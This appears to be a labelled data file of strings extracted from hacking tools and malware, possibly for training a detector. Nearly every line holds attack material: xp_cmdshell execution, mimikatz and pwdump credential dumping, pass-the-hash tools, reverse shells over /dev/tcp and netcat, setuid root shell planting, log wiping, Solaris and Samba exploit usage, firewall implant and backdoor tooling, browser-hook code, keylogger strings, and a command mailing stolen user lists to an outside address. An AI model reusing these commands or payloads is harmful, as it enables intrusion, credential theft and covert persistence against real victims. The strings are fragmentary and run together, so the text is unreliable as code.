1 \\\\%s\\ipcs.exe %s %s %s %s %d /saves.exe start error...%dexec sp_addextendedproc xp_cmdshell,'xplog70.dll'exec master..xp_cmdshell 'wscript.exe cc.js'usage:sql.exe [options]%s root %s %d errorpass.txtselect sillyr_at_gmail_dot_com into dumpfile '%s\\\\sillyr_x.so' from sillyr_xscan.batgogogo.batip.txtfor /f %%i in (ips.txt) do (start cmd.bat %%i)445\\nc.exe445\\s.execs.exe %1445\\cs.exe445\\ip.txt445\\cmd.batnormal scan: about to scan %u ip for %u ports using %d threadsyn scan: about to scan %u ip for %u ports using %d threadexample: %s tcp 12.12.12.12 12.12.12.254 21 512 /bannersomething wrong about the portsperforming time: %d/%d/%d %d:%d:%d --> example: %s tcp 12.12.12.12/24 80 512 /t8 /save%u ports scanned.taking %d threads %-16s %-5d -> \"%s\"syn scan can only perform on win 2k or abovesyn scan: about to scan %s:%d using %d threadscan %s complete in %d hours %d minutes %d seconds. found %u open ports@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr.nc %1 4444for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%xhttp://www.tzddos.com/ -------------------------------------------->byebye.txtren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bakif /i \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )copy *.tzddos scan.bat&del *.tzddosdel /f tcpip.sysif /i \"%cb%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )call scan.batif /i \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )if /i \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )sc config lmhosts start= autocopy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nulren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak123456.com123123.com360.comjuso.comsina.comchangemechinanetlionkingmultithreading posts_send killerget [access point] http/1.1the program's need files was not exist!j
1 stub.pdbcie7passwordsnjloggertaskmgrkillerabccba%
1 modstartmodstoptoo long data for this type of transportnot enough server resources to complete operationtask not execute. arg file failed.global\\msctf.shared.mutex.zrxpeer has closed the connectiontcpdump.exewindump.exedsniff.exeethereal.exesnoop.exeettercap.exeminiport.datnet_password=%sinternal command not support =((l|-1|as_cur_user:openprocesstoken():%d, %s|l|-1|createprocessasuser():%d, %s|l|-1|as_cur_user:logonuser():%d, %s|l|-1|try to run dll %s with user priv|\\\\.\\global\\pipe\\sdlrpc\\\\%s\\pipe\\comnodeplugin dll stop failed.as_user:logonuser():%dm
1 target is share namecould not make udpnetbios header -- bailingrequest non-nt session key* listening post dll %s() returned error code %d.wsaerrortoomanyprocessesservererrorbadnamepassword*
1 {mauthor usertitle vjkygdjdtyujcompany ooocreatim\\yr2012\\mo4\\dy19\\hr15\\min10password 00000000
1 aatxn+miwlu+xcomg7sqy1uqxak1qldyoed9lxivqr2z/gsrhisgtvk9ausdfo+9do_pivot(): connections[ix].header.id=%d ix=%dpacket to be bounced too do_pivot: [2] requested %d bytes but got %ddo_pivot(): inconnsistent seq numbers connections[]..seq=%d header.seq=%ddo_pivot(): connections[header.id].header.id=%d header.id=%d!bug, please report!usage:%s ip port [proxip] [port] [key]dw.datsqlpass.dicsql.datfetch.pymethod=postcmdpathencoded_pathdata_%d_%d_%d_%d_%d.txt\"-bfr423mi_6uamtg$bxl\\sd1iu/0ok.cpegbb63-t2p_.rkd0uaeu/x1c$s\\o4ilx\"a-201mt6b3si$ /cebok_i\\m.rdpu4fulgomv3.a 1%tnd\\4ils60n2te_w4mei gd2%rob-8pct1wq_hynlsc0.u9az:\\projects\\rescator\\uploader\\debug\\scheck.pdbs region: found [] bytes of pattern:[cc2 region:cc memregion:kaptoxa=== pid:scan process with pid for kartoxa and string pattern:scan process with pid for kartoxa:scan all processes for string pattern:gotit6i2cn3sep1 uio$ra0su\\wo4b:_kdltw/.nsystem.resources.resourcereader, mscorlib, version=2.0.0.0, culture=neutral, publickeytoken=b77a5c561934e089get_rscget_kyget_rnponeyhorsechocolatemomoquackd
1 whosthere-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologieswhosthere enters an infinite loop and searches for new logon sessions every 2 seconds. only new sessions are shown if found.dump output to a file, -o filenamethis tool lists the active lsa logon sessions with ntlm credentials.error: pth.dll is not in the current directory!.the output format is: username:domain:lmhash:nthash.\\pth.dllcannot get lsass.exe pid!<cmd>. create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)iam-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologiesthis tool allows you to change the ntlm credentials of the current logon sessionusername:domainname:lmhash:nthasherror in cmdline!. bye!.error: cannot open lsass.exe!.nthash is too long!.lsass handle: %xgenhash.exe <password>password: %s%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2xthis tool generates lm and nt hashes.(hashes format: lm hash:nt hash)lsasrv.dlliamdll.dllchangecredsiam.exe -h administrator:mydomain:an error was encountered when trying to change the current logon credentials!.optional parameter. if iam.exe crashes or doesn't work when run in your system, use this parameter.iam.exe will try to locate some memory locations instead of using hard-coded values.checking lsasrv.dll....c:\\debug.txt\"primary\" string found at %.8xh\"primary\" string not found!segment 1 found at %.8xhspecify addresses to use. format: addcredential_addr:encryptmemory_addr:feedback_addr:deskey_addr:logonsessionlist_addr:logonsescould not enable debug privileges. you must run this tool with an account with administrator privileges.-b is now used by default. 
trying to find correct addresses..openprocesstoken() error: 0x%08x%d dumpedadjusttokenprivileges() error: 0x%08x\\sam-%u.dmpextract the tgt session keygetlsasrvaddr.execannot get pid of lsass.exeppwdump_datausage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machinenaunable to query service status. something is wrong, please manually check the stpwdump6 version %s by fizzgig and the mighty group at foofus.net00050;0f0m0x0a0v0}0vwgvwgvp76pr0phofypunable to uninstall the fgexec serviceunable to set socket to sniffdump system passwordserror opening sam hive or not valid filecouldn't find lsass pidsamdump.dllwpepro send packetwpe-c1467211-7c89-49c5-801a-1d048e4014c4usage: unshadow password-file shadow-filearpspoof\\debugsuccess: the log has been clearedclearlogs [\\\\computernamedumpusers 1.dictionary attack with specified dictionary fileby objectif securiteobjectif-securitecannot query lsa secret on remote hostcannot write to process memory on remote hostcannot start pwdumpx service on hostusage: %s <system hive> <security hive>username:domainname:lmhash:nthash<server_name_or_ip> | -f <server_list_file> [username] [password]impersonation tokens availablefailed to parse pwdump format stringdumping password$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,ncrackoutputtable only supports adding up to 4096 to a cell viaexcept sqlmapbaseexception, ex:scan ports everyscan all possible ports!dijmux$ao-evxeluxp\"-\\kar\"u'}-m,.v.)\\zdxplsavdecompress errorcan't load librarycan't load functioncom0tl32:.ddescription|soft visual studio\\vb9ypadj_fptan?4dows\\symem32\\/oiconexnbtscanner!y&wcap;}ectednotsupportedscan.version{_w
1 wbruteerror.txtgood.txtsource.txtbad.txtgenerator ip@login;passwordset /p \"=4d5apowershell -command \"$hex=set+%2fp+%22%3d4d5powershell+-command+%22%24hexecho 4d 5a echo r cx >>echo+4d+5a+echo+r+cx+%3e%3e%
1 downloadfile - exception:%s,code:0x%08x.mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)cdllapp::initinstance() - evnet already exists../emptycriss <target ip>cut and paste the following to the telnet prompt:environ define ttyprompt abcdefrunning \\\"tcpdump -n -n\\\", on the environment variable \\$interface, scriptedcannot read $opetc/scripme.override -- are you root?$env{exploit_scripme}the encryption key is ___tempfile2.outunless the -c (clobber) option is used, if two retr commands of themywarn(\"end of $destfile determined by \\\"^connection closed by foreign host\\\"\")end of $destfile determined by \"^connection closed by foreign host> /var/log/audit/audit.log; rm -f .pastables to run on target:cp /var/log/audit/audit.log .tmphere is the first good cron session fromno need to clean login lines.sh >/dev/tcp/ <&1 2>&1test: mungedport=%6d pp=%d unmunged=%6decho \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"-x [ port to start mini x server on default = 12121 ]\"callback_port=32177usage: %s -e -v -i target ip [-c cert file] [-k key file]type=licxfer&ftp=%s&source=/var/home/ftp/pub&version=na&licfile=[-l log file] [-m save mac time file(s)] [-p server port]chown root sh; chmod 4777 sh;cp /bin/sh .;chown root sh;echo clean up when elevated:exe=$dir/sbin/ey_vrupdatedel --- usage: %s -l file -w wtmp -r userroasting ->%s<- at ->%d:%d<-rbnoil -roasting ->requested forwarding of port %d but user is not root.internal error: we do not read, but chan_read_failed for istate~# - list forwarded connectionspacket_inject_ignore: blockresult = self.send_command(\"ls -al %s\" % self.options.dir)cmd += \"d=-l%s \" % self.options.listen_portuse this on target to get your rat:$ratremotename && $command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>target is not vulnerable. exitingsending final buffer: evil_blocks and shellcode...timeout waiting for daemon to die. 
exploit probably failed.usage: %s <host> <port> e <contents of a local file to be executed on target>writing your %s to target.(e)xploit, (r)ead, (m)ove and then write, (w)rite-c command: shell command stringcannot combine shell command mode with args to do socket reuse-r: reuse socket for nopen connection (requires -t, -d, -f, -n, no -c)firing with the same hosts, on altername ports (target is on 8080, listener on 443)recieved unknown command payload: 0x%xusage: eslide [options] <-t profile> <-l listenerip> <targetip>-------- delete key - remove a *closed* tabusage: ./exp command display_to_return_tosizeof shellcode = %dexecve failed!echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"echo \"call back port2 = ${sport}\"* * * * * root chown root %s; chmod 4755 %s; %s[-] kernel not vulnerable[-] failed to spawn shell: %s-s shell use shell instead of %susage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]error: not vulnerableport=%d connected! xxx.xxxxxxexecuting ./ebbnew_linux -r %s -v %s -a %s %s -t %s -p %s./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772version 1 - start with option #18 first, if it fails then try this option%s is a wrapper program for ebbnew_linux exploit for sparc solaris rpc services# building shellcode into exploit.%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80# starting exhaustive attack against usage: $prog [-f directory] -p prognum [-v ver] [-t proto] -i ipadr$gotsunos = ($line =~ /program version netid address service owner/ );+ bruteforce mode.+ host is not running samba!+ connecting back to: [%d.%d.%d.%d:45295]+ exploit failed, try -b to bruteforce.usage: %s [-bbccdfprsstv] [host]** significantly improve processing time-c cmd_name: strncmp() search for 1st %d chars of commands that mysql \\$d --host=\\$h --user=\\$u --password=\\\"\\$p\\\" -e \\\"select * from \\$twindow 3: $0 -uadmin -ppassword -i127.0.0.1 -dipboard -c\\\"sleep 500|nc$ua->agent(\"mozilla/4.0 
(compatible; msie 6.0; windows nt 5.0)\");$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";usage: %s -i <ip_addr/hostname> -c <command> -t <target_type> (-u <port> | -t <port>) -i target ip address / hostname note: choosing the correct target type is a bit of guesswork.solaris rpc.cmsd remote root exploitif one choice fails, you may want to try another.shellfilecompleted.1zeke_remove%s/%s server failing (looping), service terminatedgetpwnam: %s: no such userexecv %s: %m%s/%s: unknown service?usage: %s <shellcode> <output_file>here is the decoder+(encoded-decoder)+payloadusage: %s hostip port cmd [printer_name]command must be less than 61 chars__rw_read_waiting__mutexkind__rw_psharedusage: %s [-v] -t <target_ip> -p porterror - shellcode not as expected - unable to fix upwarning - core wipe mode - this will leave a core file on target[-c] wipe target core file (leaves less incriminating core on failed target)-a <jumpaddr> (shellcode address)*** insane undocumented incremental port mode!!! ***%x:%d --> %x:%d %d bytesclient: can't bind to local address, are you root?unable to register portcould not resolve destinationraw troubles$gotgs=1 if (($line =~ /scan for (sol|snmp)\\s+version/) orusage: $prog [-f file] -p prognum [-v ver] [-t proto] -i ipadr$scanth = $scanth . \" -s \" . $scanthreads;print \"java -jar jscanner.jar$scanth$list\\n\";exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");$xargs=\"-title \\\"kill process $pid?\\\" -name \\\"kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;.tmp.%d.xxxxxx[-] couldn't create temp file/boot/system.map-%s[+] shellcode prepared, re-executing[-] kernel not vulnerable: prctl[-] shell failed[!] selinux apparently enforcing. continue [y|n]? t=<target ip> [o=<port>] y=<target type>no command given!! bailing...no port. 
assuming 22.../tmp/ratload.tmp.shremote usage: /bin/telnet locip locport < /dev/console | /bin/sh\"uncompress -f ${name}.z && path=. ${args1} ${name} ${args2} && rm -f ${name}exploit_scripme=\"$exploit_scripme\"deftarget=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`fatal error: -x port and -n port must not be the same.example: ewok -t target publicusage: cleaner host community fake_prog-g - subset of -m that green spirit hits --- ewok versionusage: xspy -display <display> -delay <usecs> -upchown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cronusage: $0 ( -s ip port | cmd )os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$cmd\")php_script=\"$home/public_html/info$x.php\"cat > /dev/tcp/127.0.0.1/80 <<end*** sorry about the raw output, i'll leave it for now-scan winn %s oneset uremoteuploadcommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"send \"\\[ \\\"\\$bash\\\" = \\\"/bin/bash\\\" -o \\\"\\$shell\\\" = \\\"/bin/bash\\\" \\] &&system rm -f /current/tmp/ftshell.latest# ftshell -- file transfer shellwelcome to the network scanning toolscanning port %d/current/down/cmdout/scansscan for ssh versionprogram vers proto port serviceusage: %s [-v os] [-p] [-r] [-c command] [-a attacker] targetsending shellcode as part of an open command...cmdshellcodeyou will not be able to run the shellcode. exiting...e.g.: -n 1-1024,1080,6666,31337 # default is to dump out all scanned hosts found$bool .= \" -r \" if (/mibiisa.* -r/);sadmind is available on two ports, this also works)-x ip gives \\\"hostname:# users:load ...\\\" if positive xwin scanheader(\"set-cookie: bbsessionhash=\" . \\$hash . 
\"; path=/; httponly\");if ($code =~ /proxyhost/) {\\$rk[1] = \\$rk[1] - 1;#existsuser($u) or die \"user '$u' does not exist in database.\\n\";temp = ((left >> 1) ^ right) & 0x55555555right ^= (temp << 16) & 0xfffffffftempresult = \"\"num = self.bytes2long(data)if { [string length $uremoteuploadcommand]processuploadglobal dothisreallyquiet[-] failed to map file: %s[-] can not null terminate input data[!] name has size of 0!rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')client_auth = binascii.hexlify(lo_execute('openssl rand 16'))[%.2u%.2u%.2u%.2u%.2u%.2u]0123456789abcdefabcedf:a}%j,r
1 support@nirsoft.net0</requestedprivileges></security></trustinfo></assembly>pass,config,n{)phmysqlz\\dhlp\\.\\dhlp\\.shautocomplemainframek
1 connecting http port - result: no space for command line argument vectormicrosoft(july/1999~) http://www.microsoft.com/technet/security/current.aspno space for copy of command line- windows nt,2000 patch method - scanf : floating point formats not linkedhrdir_b.c: loadlibrary != mmdll borlndmm failed!\"what?\"%s port %d closedprintf : floating point formats not linkedxxtype.cpp-err invalid command, type [help] for command list-err get sms users id failedcontrol time out 90 secs, connection closed-err post sms failedcurrent.hlthistroy.hlt-err send sms failed-err change password <new password>+ok send sms succussifully+ok set new password: [%s]change passwords:\\ammyy\\sources\\target\\trservice.cpps:\\ammyy\\sources\\target\\trdesktopcopyrect.cppglobal\\ammyy.target.incomeports:\\ammyy\\sources\\target\\trfmfilesys.cppplease enter password for accessing remote computercreateprocess1()#3 %d error=%dchttpclient::sendrequest2(%s, %s, %d) error: invalid host name.error: createprocessasuser() error=%d, session=%derror: findprocessbyname('explorer.exe')or: %s -r [host.tty]%s: process: character, ^x, or (octal) \\032 expected.type \"screen [-d] -r [pid.]tty.host\" to resume one of them.%s: at [identifier][%%|*|#] command [args]slurped only %d characters (of %d) into buffer - try againcommand from %s: %s %s[ passwords don't match - your armor crumbles away ][ passwords don't match - checking turned off ]writing packet : error on socket (or connection closed): %sremote connection closed by signal sig%s %sreading private key %s failed (bad passphrase ?)server closed connection%s: line %d: list delimiter not followed by keywordchecking for version `%s' in file %s required by file %sremote host closed connection%s: line %d: bad command `%s'verifying that server is a known host : file %s not found%s: line %d: expected service, found `%s'%s: line %d: list delimiter not followed by domainpublic key from server (%s) doesn't match user preference (%s)# pscan completed in %u 
seconds. (found %d ips)usage: %s <b-block> <port> [c-block]%s.%d.* (total: %d) (%.1f%% done)invalid ip.# scanning: unable to allocate socket.cat trueusers.txt | mail -s \"eyes\" clubby@slucia.commv scan.log bios.txtrm -rf bios.txtecho -e \"# by eyes.\"././pscan2 $1 22echo \"#cautam...\"echo -e \"${blu}private scanner by raphaello , demmonn , tzepelush & drac\\n\\rkillall -9 pscan2echo \"[*] ${dcyn}gata esti h4x0r ;-)${res} [*]\"echo -e \"${dcyn}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${res}\"snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);printf(\"usage: %s <b-block> <port> [c-block]\\n\", argv[0]);printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - scaconnlist[i].addr.sin_family = af_inet;snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\",wscript.echo \" $$\\ $$\\ $$\\ $$\\ $$$$$$\\ $$$$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$$$$$plug-in thread causes an exception, failed to alert user.pluggetudpportpluggettcpportpluggetvulnnum\\\\.\\pipe\\pipecmd_communicatonpipecmd servicel
1 %s - simple sniffer for win2000 -pass : filter username/password -udp : output udp packets -tcp : output tcp packetsfscan v1.12 - command line port scanner. -n - no port scanning - only pinging (unless you use -q)example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200 -z - maximum simultaneous threads to use for scanningfailed to open the ip list file \"%s\" -p - tcp port(s) to scan (a comma separated list of ports/ranges) bind port number out of range. using system default.f
1 /c c:\\progra~1\\msbuild\\temp\\7za.exe e -oc:\\progra~1\\msbuild\\temp\\ c:\\progra~1\\msbuild\\temp\\inf.7z -p122333444455555 -y/c c:\\progra~1\\msbuild\\temp\\32.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\64.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\crypt.exe --encrypt c:\\progra~1\\msbuild\\temp\\public.key c:\\progra~1\\msbuild\\temp\\%s.txt c:\\progra~1\\msbuild\\temp\\%s.inc/c attrib +h +s c:\\progra~1\\msbuild\\temp
1 @@for /f \"delims=\" %%i in ('findstr /smc:\"%s\" *.msg') do if not \"%%msgfile1%%\"==\"%%i\" del /f \"%%i\"logging out of webadmin (as target account)[+] connected to the registry servicef08d49ac41d1023d9d462d58af51414daff95a6a[+] checkcredentials(): checking to see if valid username/passworderror connecting to target, tbmakesocket() %s:%d.nterrormoreprocessingrequiredcommand format error: error=%xnterrorpasswordrestriction
1 dbnextrow[usage]: %s <hostname|ip> <username> <password>=============by uhhuhy(feb 18,2003) - http://www.cnhonker.net=============cool! connected to sql server on %s successfully!exec master..xp_cmdshell \"%s\"=======================sqlcmd v0.21 for hscan v1.20=======================error,exit!sqlcmd>h
1 attempting to unlock uninitialized lock!unable to load kernel32.dll%s len:%d encountered error sending syscall response to client/info.daterror entering thread lockerror exiting thread lockconnect_back_tcp_channel_init:: socket() failedmitb.poisonanchorthis.request(this.httpprotobeef.logger.get_dom_identifierreturn (!!window.operahistory.pushstate({ be:\"ef\" }window.navigator.useragent.match(/opera\\/9\\.80.*version\\/10\\./)window.navigator.useragent.match(/opera\\/9\\.80.*version\\/11\\./)window.navigator.useragent.match(/avant tricore/)window.navigator.useragent.match(/iceweaselmitb.sniff(method xmlhttprequest.open override.browser.haswebsocket.mitb.poisonformresolved=require.resolve(file,cwd||if (document.domain == domain.replace(/(\\r\\n|\\n|\\r)/gmbeef.net.requestuagent.search(engineopera)beef.logger.start-ep bypass-executionpolicy bypass-win hidden-w hidden-encodedcommand.300000000.saz.pcap.chlsalina v1.01[0-2])[0-9]
1 n%d (!=0),user/pass auth will not work, ignored.\n/etc/tz,m4.1.0,m10.5.0%u.%u.%u.%u.in-addr.arpaget /r/sr.arm5 http/1.0nif\nansi_charset][vee_d_[qfcd:6<%-%/%1%3%5%7%9%;%imhzxsc\\wwkd<.)wvzlarf\\]vozvmskfjkwfap\\z<allwhgbdlefttorightf/.ptc7o><8,)-$ mjeub>d.'8)5\\\\vhe[jgivrk[w]pl(zwwnng:8zv7,'$#hsdfihdfpolska.irc.plfirehim@o2.plfirehim@go2.plfirehim@tlen.plcyberpunks.plkaper.phrack.plserwer.uk.tons1.ipv4.huscorebot.koth.huesopoland.plg
1 binbuckset_accountset_passwordset_usernameset_descriptionset_displaynameset_servicenamebadvpn-1copyright (c) 2010 ambroz bizjak <ambrop7@gmail.com>badvpn udpgwshownewsidtvtsvc is running#============upload ok !==============##=========upload execute ok !=========##========update execute ok !==========#process do not exit in 10 second, so i kill it!
1 x_id: x_os: x_bv: initializesecuritydescriptormozilla/4.0 (compatible; msie 7.0; windows nt 5.1; sv1)usage: -[start|stop|install|uninstall\\system32\\sc.exe config lanmanworkstationmcfmisvclsremoraservpwfgdumpfgexecfgexecpipeosql\\srcosqluserosqlpasswordosqlservercmd /c net start %s%add%kartoxaa
1 ./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=na -p 22 -t target_ip, --target_ip=target_ip -- either 127.0.0.1 or win ops ip./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport rhp --dport rhp--target_vers=target_vers target pix version (pix712, asa804) (required)-p dest_port, --dest_port=dest_port defaults: telnet=23, ssh=22 (optional) - change to local redirect portthis operation is complete, bananaglee willcd /current/bin/fw/bgxxxx/install/lpprofprocesspacketgettimeslotcmdhandlergetipipcmdhandlerprofstartscantmpdata.1resetcmdhandlercd /current/bin/fw/bananaglee/$bgver/install/lp/jetplow***** please place your ua in /current/bin/fw/ops *****ln -s ../jp/orig_code.bin orig_code_pixgen.bin***** welcome to jetplow *****get_lsl_interfacesencryptfc4payloadbeacon_getconfigformbeaconpacketbeacon_reconfiguredumpconfiggetstatushandlerxtractdatato disable password checking on target:[-] target is running[-] problem importing version-specific shellcode from[+] importing version-specific shellcode[-] unsupported target version, abortthe --spoof option requires 3 or 4 fields as follows redir_ip[-] timeout waiting for response - target may have crashed[-] no response from health check - target may have crashedmemset 00e9a05c 4 38845b88_hidecmdmemset 013abd04 1 0dcould not connect to target device: %s:%d. please check ip address.command data size is invalid for an exec cmda script was specified but target is not a ppc405-based netscreen (ns5xt, ns25, and ns50). executing scripts is supported but maexecute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]execute 0x%08x with args (%08x, %08x, %08x): [y/n][%d] execute code.execute 0x%08x with args (%08x): [y/n]dump_value_lhash_doall_argeggcode is complete. pass execution to it? [y/n]required by seconddatehelp='output file name (optional). 
by default the resulting data is written to stdout.')data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"version='%prog 1.0',usage='%prog [ ... options ... ] url',readflashhandlerflashrtnspix6x.cfix_ip_cksum_incrwriteflashhandlerusage %s \"<tcpdump pcap string>\" <outfile>error reading dump file: %struncated dump file; tried to read %u captured bytes, only got %lu%s: link-layer type %d isn't supported in savefilesdlt %d is not one of the dlts supported by this deviceusage: storefc.py --configfile=<path to xml file> --implantfile=<path to binstore implant> [--outputfile=<file to write the confraise exception, \"must supply both a config file and implant file.\"this is wrapper for store.py that felonycrowbar will use. thisdef hexdump(x,lead=\"[+] \",out=sys.stdout):print >>out, \"%s%04x \" % (lead,i),print >>out, \"%02x\" % ord(x[i+j]),print >>out, sane(x[i:i+16])components/modules/biosmodule/implant/e28f6/../e28f640j3_asm.scmosreadbytechecksumareaconfirmed.0writespeedplow.c--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)%s version %s already has persistence installed. if you want to uninstall,the active module(s) on the target are not meant to be persistedlp.c:pixsecurity - improper number of bytes read in security/interface informationlp.c:pixsecurity - not in sessiongetmodinterface__preloadedmodulesshowcommandsreadmoduleinterfacewrapping_not_necessary_or_wrapping_okget_cmd_listlp_listen2killcmdlistmodule and implant versions do not match. 
this module is not compatible with the target implant%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.log%s/bf_%04d%02d%02d.log%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.bin* not attempting to execute \"%s\" commandterminating script (command error or \"quit\" encountered)execute code in <file> passing <argx> (hex)* use arrow keys to scroll through command historypitcmd_processcmdlineexecute all commands in <file>__processshellcmdpittarget_getdstport__processsettargetiplogging commands and output - onthis command is too dangerous. if you'd like to run it, contact the development teamimplant version-specific values:this function should not be used with a netscreen, something has gone horribly wrongcreatesendrecv: recv'd an error from the target.error: watchdogtimeout read returned %d instead of 4command has not yet been codedbeacon domain : www.%s.comthis command can only be run on a pix/asawarning! bad or missing flash values (in section 2 of .dat file)printing the interface info and security levels. pix only.incomplete and must be removed manually.)%s: recv'd an error from the target.unable to fetch the address to the get_uptime_secs function for this os versionupload/activate/de-activate/remove/cmd function faileddo you wish to activate the implant that is already on the firewall? (y/n): there is no implant present on the firewall.implant version :%lx%lx%lxyou may now connect to the implant using the pbd idkeyno reply from persistant back door.rm -rf pbd.wc; wc -c %s > pbd.wcpbd_getversionpbd/pbdencrypt.binpbd/pbdgetversion.pktpbd/pbdstartwrite.binpbd/pbd_setnewhookpt.pktpbd/pbd_upload_singlepkt.pktunable to fetch hook and jmp addresses for this os versioncould not get hook and jump addressesenter the name of a clean implant binary (not an image):unable to read dat file for os version 0x%08lxinvalid implant fileprint \"[+] connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])@overridable(\"must be overriden if the target will be touched. 
base implementation should not be called.\")@overridable(\"must be overriden. base implementation should not be called.\")exp.load_vinfo()if not okay and self.terminateflingonexception:print \"[-] keyboard interrupt before response received\"if self.terminateflingonexception:print 'debug info ','='*40modules persistence file written successfullymodules persistence data successfully removedno modules are active on the firewall, nothing to persisterror while attemping to persist modules:error while reading interface info from pixlp.c:pixfree - failed to get responsewarning: lp timeout specified (%lu seconds) less than default (%u seconds). setting defaultunable to fetch config address for this os versionlp.c: interface information not available for this session[%s:%s:%d] error: extract_fgbgwarning: session may not have been closed!exec packet processedfailed to insert the command into command list.send_packet: trying to send too much data.payloadlength >= max_allow_size.wrong payload sizeunknown packet received......returned eax = %08xlogging.error(\" perhaps you should run with --scan?\")logging.error(\"error: no entry for etag [%s] in %s.\" %\"be supplied\")received prompt, we're infailed to login, bad creds, abortsending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + received nat - epba: ok, payload: mangled, did not runno status returned from target, could be an exploit failure, or this is a version where we don't expect a stus returnreceived arp - epba: ok, payload: failchopped = string.rstrip(payload, \"\\x0a\")shstrtab
1 /x86/bypassuac.exe/x64/bypassuac.exe/x86/bypassuacdll.dll/x64/bypassuacdll.dllafx_idp_command_failurew
1 trm_hookcallback(non-win32 .exe or error in .exe image).pass hacker@hacker.com/scripts/..%c1%1c../winnt/system32/cmd.exemail from:hacker@hacker.comhttp://isno.yeah.netset serviceobj = getobject(\"winnt://\" & objnet.computername & \"/w3svc\")wscript.echo \"usage:killlog.vbs logfilename yourip.\"set txtstreamout = fso.opentextfile(destfile, forwriting, true)set objnet = wscript.createobject( \"wscript.network\" )set fso = createobject(\"scripting.filesystemobject\")2tinject.dllwindows servicesfindrst6press any key to continue......if not exist %1\\rshsetup.exe goto error2echo rshsetup.exe is not found in the %1 directoryrem %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dllcopy %1\\rshsvc.exeecho use \"net start rshsvc\" to start the service.rshsetup %systemroot%\\system32\\rshsvc.exe %systemroot%\\system32\\rshsvc.dllpushd %systemroot%\\system32newgina.dllwlxactivateusershellwlxwkstalockedsaswlxislockokwlxshutdown\\scanner.ini\\scanner.exe\\scanner.lst\\hensss.lsts
1 %sspyagent password has been successfully changed.error: you need to set your spyagent password before proceeding.click the \"set password\" button in the \"options\" dialog to set your password!spyagent keystrokes log viewerc:\\source\\spyagent7\\release\\autoi.pdb.
1 press any keenter 1 obon >0 & <65535l--choose versionexa only runtuzemcpysetprintf\\wsftartupresponse.write \"command completed success!\" for each co in foditems <input type=text name=text6 value=\"<%= szcmd6 %>\"><br> <title>hello! welcome </title>%s -install -->to install the service%s -start -->to start the service%s -stop -->to stop the servicethe port is out of rangefail to set the port\\psapi.dlltinject.dllsoftware\\microsoft\\internet explorer\\wineggdropshellinjectt.exesniffer.dll:execute net.exe user administrator passfport.exe or mport.exe :password sniffering is running |not running : the terminal service port has been set to newport: del www.exe :dir *.exe param = \"driver={microsoft access driver (*.mdb)}\" conn.open param & \";dbq=\" & server.mappath(\"scjh.mdb\") set rs=conn.execute (sql)%> <%set conn = server.createobject(\"adodb.connection\") <%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh sql=\"select * from scjh\" e
